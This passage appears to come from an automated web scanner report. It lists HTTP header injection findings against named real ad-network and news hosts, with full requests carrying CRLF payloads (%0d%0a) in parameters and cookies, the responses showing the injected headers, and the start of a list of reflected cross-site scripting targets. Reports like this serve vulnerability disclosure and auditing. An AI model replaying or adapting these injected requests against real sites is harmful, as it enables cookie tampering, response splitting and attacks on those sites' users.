Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:10:49 GMT;path=/;httponly

5.6. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.oregonlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload defe0%0d%0a53610917434 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=defe0%0d%0a53610917434&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:14 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=defe0
53610917434; expires=Tue, 04-Oct-11 04:02:14 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:14 GMT;path=/;httponly

5.7. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 8aac2%0d%0a98846847a98 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=8aac2%0d%0a98846847a98&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:8aac2
98846847a98;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=42:60:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=169
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:06 GMT
Content-Length: 5179
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',8aac2
9
...[SNIP]...

5.8. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload aa378%0d%0ada9d31b7676 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=aa378%0d%0ada9d31b7676&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378
da9d31b7676,cb964';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=144
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:14 GMT
Content-Length: 4571
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='aa378
d
...[SNIP]...

5.9. http://d7.zedo.com/utils/ecSet.js [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 230a8%0d%0a11aff24a572 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=230a8%0d%0a11aff24a572&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 230a8
11aff24a572;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4098
Date: Sun, 04 Sep 2011 02:31:53 GMT
Connection: close

5.10. http://dp.33across.com/ps/ [33x_ps cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dp.33across.com
Path:	/ps/

Issue detail

The value of the 33x_ps cookie is copied into the Location response header. The payload 1c931%0d%0ad466519e7bc was submitted in the 33x_ps cookie. This caused a response containing an injected HTTP header.

Request

GET /ps/?pid=533 HTTP/1.1
Host: dp.33across.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C1c931%0d%0ad466519e7bc

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 02:42:53 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C1c931%0D%0Ad466519e7bc; Domain=.33across.com; Expires=Mon, 03-Sep-2012 02:42:53 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=9035684957&seg_code=33x,6940,1c931
d466519e7bc&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26adv%3D307445%26code%3D6940%26code%3D1c931%0D%0Ad466519e7bc&random=520952
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

5.11. http://login.dotomi.com/ucm/UCMController [redir_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The value of the redir_url request parameter is copied into the Location response header. The payload 302dc%0d%0a2c2c5bc8c57 was submitted in the redir_url parameter. This caused a response containing an injected HTTP header.

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=302dc%0d%0a2c2c5bc8c57 HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaV0%3D; DotomiRR2304=-1$4$1$-1$1$1$; rt_12783=2

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:25:04 GMT
X-Name: dmc-s01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Fri, 02-Sep-2016 11:25:04 GMT; Path=/
Location: http://login.dotomi.com/ucm/302dc
2c2c5bc8c57

Content-Type: text/html
Content-Length: 0

5.12. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oas.guardian.co.uk
Path:	/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The value of REST URL parameter 2 is copied into the OAS_DE_ERROR response header. The payload e17c4%0d%0a7333c9dabee was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /adstream.cap/e17c4%0d%0a7333c9dabee HTTP/1.1
Host: oas.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 04:16:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: OAS-Cap: No query string found. request to 'oas.guardian.co.uk' for '/adstream.cap/e17c4
7333c9dabee', referer '', handler 'cap-add'
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<
...[SNIP]...

5.13. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oas.guardian.co.uk
Path:	/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload f3bcd%0d%0a01cbdde2839 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=f3bcd%0d%0a01cbdde2839&dv=1&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: f3bcd
01cbdde2839=1; expires=Tue, 04-Oct-11 04:00:19 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

5.14. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [dv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oas.guardian.co.uk
Path:	/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload e3c48%0d%0ae00512b83fa was submitted in the dv parameter. This caused a response containing an injected HTTP header.

Request

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=crtGdnUS&dv=e3c48%0d%0ae00512b83fa&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 04:01:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: error converting 'e3c48
e00512b83fa' value to numeric value [i]. request to 'oas.guardian.co.uk' for '/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e', referer 'http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c', handler 'cap-add'
Content-Length: 618
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

5.15. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc12.247realmedia.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The value of REST URL parameter 4 is copied into the OAS_DE_ERROR response header. The payload c5a46%0d%0a6fed33b49d9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/c5a46%0d%0a6fed33b49d9 HTTP/1.1
Host: oasc12.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 04:18:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: OAS-Cap: No query string found. request to 'oasc12.247realmedia.com' for '/RealMedia/ads/adstream.cap/c5a46
6fed33b49d9', referer '', handler 'cap-add'
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<
...[SNIP]...

5.16. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc12.247realmedia.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload f35db%0d%0a0df7bbf4cf1 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=f35db%0d%0a0df7bbf4cf1&va=1&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:59:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: f35db
0df7bbf4cf1=1; expires=Tue, 04-Oct-11 03:59:44 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

5.17. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc12.247realmedia.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 9024a%0d%0a74cf762925 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=martinicrt&va=9024a%0d%0a74cf762925&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: martinicrt=9024a
74cf762925; expires=Tue, 04-Oct-11 04:00:17 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

5.18. http://optout.crwdcntrl.net/optout [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://optout.crwdcntrl.net
Path:	/optout

Issue detail

The value of the ct request parameter is copied into the Location response header. The payload 859c1%0d%0a18e4734e5e9 was submitted in the ct parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=859c1%0d%0a18e4734e5e9 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:24:22 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:38:29 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=859c1
18e4734e5e9&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

5.19. http://optout.crwdcntrl.net/optout [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://optout.crwdcntrl.net
Path:	/optout

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 38b21%0d%0a9f976ce8cc0 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=38b21%0d%0a9f976ce8cc0 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:18:13 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:20 GMT
Location: http://optout.crwdcntrl.net/optout?d=38b21
9f976ce8cc0&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

5.20. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://optout.crwdcntrl.net
Path:	/optout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5c587%0d%0aa6834fe02bc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&5c587%0d%0aa6834fe02bc=1 HTTP/1.1
Host: optout.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:18:20 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:27 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&5c587
a6834fe02bc=1&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

5.21. http://t.mookie1.com/t/v1/event [migDest parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.mookie1.com
Path:	/t/v1/event

Issue detail

The value of the migDest request parameter is copied into the Location response header. The payload 46c19%0d%0ac678bd8e895 was submitted in the migDest parameter. This caused a response containing an injected HTTP header.

Request

GET /t/v1/event?migClientId=2451&migAction=ibehavior_tidal&migSource=mig&migDest=http%3A%2F%2Fuav.tidaltv.com%2F3PDPHandler.aspx%3Ftpdp%3D25%26app%3D3%26segs%3D46c19%0d%0ac678bd8e895&vid=0 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:24:04 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914807826538115; path=/; expires=Wed, 03-Oct-12 03:24:04 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|914807826538115|1315106598; path=/; expires=Wed, 03-Oct-12 03:24:04 GMT; path=/; domain=.mookie1.com
Location: http://uav.tidaltv.com/3PDPHandler.aspx?tpdp=25&app=3&segs=46c19
c678bd8e895
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

6. Cross-site scripting (reflected) previous next
There are 231 instances of this issue:

http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]
http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]
http://ad4.liverail.com/ [name of an arbitrarily supplied request parameter]
http://addoer.com/showfixads.php [tabname parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
